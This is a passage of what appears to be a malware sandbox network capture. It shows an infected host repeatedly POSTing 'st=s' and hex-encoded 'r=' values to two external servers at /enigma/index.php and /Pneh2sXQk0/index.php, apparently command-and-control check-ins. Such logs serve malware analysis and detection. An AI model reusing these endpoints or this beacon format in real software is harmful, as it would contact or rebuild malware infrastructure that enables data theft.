                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:59.577739000 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1309 | 192.168.2.5 | 51163 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:59.667876959 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:59.915719986 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1310 | 192.168.2.5 | 51164 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:59.825238943 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:00.099315882 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1311 | 192.168.2.5 | 51165 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:59.940135956 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:00.197169065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1312 | 192.168.2.5 | 51166 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.450005054 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.703012943 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1313 | 192.168.2.5 | 51167 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.537699938 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.784501076 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1314 | 192.168.2.5 | 51168 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:00.955657005 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.207039118 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1315 | 192.168.2.5 | 51169 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.044456005 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.300843000 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1316 | 192.168.2.5 | 51170 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.536145926 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.781701088 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1317 | 192.168.2.5 | 51171 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.658165932 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:01.913620949 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1318 | 192.168.2.5 | 51172 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.035464048 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.287914991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1319 | 192.168.2.5 | 51173 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.170758963 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.423598051 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1320 | 192.168.2.5 | 51174 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.627404928 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.867762089 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1321 | 192.168.2.5 | 51175 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:02.776216984 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.026442051 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1322 | 192.168.2.5 | 51176 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.124958992 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.382359982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1323 | 192.168.2.5 | 51177 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.275702953 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.525648117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1324 | 192.168.2.5 | 51178 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.736181021 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:03.985179901 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1325 | 192.168.2.5 | 51179 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:03.867253065 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:04.110099077 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
